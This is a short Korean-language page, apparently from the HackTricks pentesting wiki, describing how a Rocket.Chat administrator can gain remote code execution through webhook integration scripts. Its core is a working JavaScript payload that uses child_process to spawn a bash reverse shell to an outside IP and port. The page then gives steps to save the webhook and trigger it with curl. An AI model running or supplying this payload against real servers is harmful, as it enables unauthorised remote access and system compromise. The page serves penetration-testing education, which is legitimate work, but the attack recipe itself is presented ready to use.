로켓 챗

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

RCE

로켓 챗에서 관리자인 경우 RCE를 얻을 수 있습니다.

• **Integrations**로 가서 **New Integration**을 선택하고 Incoming WebHook 또는 Outgoing WebHook 중 하나를 선택합니다.
• /admin/integrations/incoming

• 문서에 따르면, 두 가지 모두 ES2015 / ECMAScript 6 (기본적으로 JavaScript)를 사용하여 데이터를 처리합니다. 그래서 자바스크립트용 rev shell을 얻어봅시다:

const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

• WebHook을 구성합니다 (채널과 사용자 이름으로 게시물이 존재해야 합니다):

• WebHook 스크립트를 구성합니다:

• 변경 사항 저장
• 생성된 WebHook URL을 가져옵니다:

• curl로 호출하면 rev shell을 받을 수 있습니다.

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.